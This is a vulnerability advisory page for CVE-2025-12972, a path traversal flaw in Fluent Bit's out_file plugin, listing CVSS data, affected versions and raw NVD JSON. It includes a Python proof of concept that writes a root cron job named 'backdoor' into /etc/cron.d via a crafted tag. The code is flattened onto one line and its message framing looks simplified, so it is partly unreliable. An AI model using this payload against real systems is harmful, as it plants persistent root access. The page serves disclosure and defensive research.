Security Vulnerability Report
中文
CVE-2025-12972 CVSS 5.3 MEDIUM

CVE-2025-12972

Published: 2025-11-24 15:15:47
Last Modified: 2025-11-28 18:15:46
Source: [email protected]

Description

Fluent Bit out_file plugin does not properly sanitize tag values when deriving output file names. When the File option is omitted, the plugin uses untrusted tag input to construct file paths. This allows attackers with network access to craft tags containing path traversal sequences that cause Fluent Bit to write files outside the intended output directory.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:treasuredata:fluent_bit:4.1.0:*:*:*:*:*:*:* - VULNERABLE
Fluent Bit < 4.1 (fixed in v4.1)
Fluent Bit < 4.0.x (backported fix in v4.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import time # PoC for CVE-2025-12972 - Fluent Bit out_file Path Traversal # This PoC demonstrates how to exploit the path traversal vulnerability def send_malicious_tag(host, port, tag, message): """Send a malformed log entry with path traversal in the tag""" msgpack_data = pack_msgpack(tag, message) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host, port)) sock.send(msgpack_data) sock.close() def pack_msgpack(tag, message): """Pack data in MessagePack format for Fluent Bit""" # Simplified MessagePack packing import msgpack return msgpack.packb({ 'tag': tag, 'message': message, 'timestamp': time.time() }) # Example: Write to /etc/cron.d using path traversal malicious_tag = '../../../../etc/cron.d/backdoor' payload = '*/5 * * * * root /tmp/malicious.sh' print(f'Exploiting CVE-2025-12972 with tag: {malicious_tag}') # send_malicious_tag('target-ip', 5140, malicious_tag, payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12972", "sourceIdentifier": "[email protected]", "published": "2025-11-24T15:15:46.627", "lastModified": "2025-11-28T18:15:46.400", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fluent Bit out_file plugin does not properly sanitize tag values when deriving output file names. When the File option is omitted, the plugin uses untrusted tag input to construct file paths. This allows attackers with network access to craft tags containing path traversal sequences that cause Fluent Bit to write files outside the intended output directory."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:treasuredata:fluent_bit:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4D0EA105-B741-4E44-828A-9300B09A7A79"}]}]}], "references": [{"url": "https://fluentbit.io/blog/2025/10/28/security-vulnerabilities-addressed-in-fluent-bit-v4.1-and-backported-to-v4.0/", "source": "[email protected]"}, {"url": "https://www.oligo.security/blog/critical-vulnerabilities-in-fluent-bit-expose-cloud-environments-to-remote-takeover", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.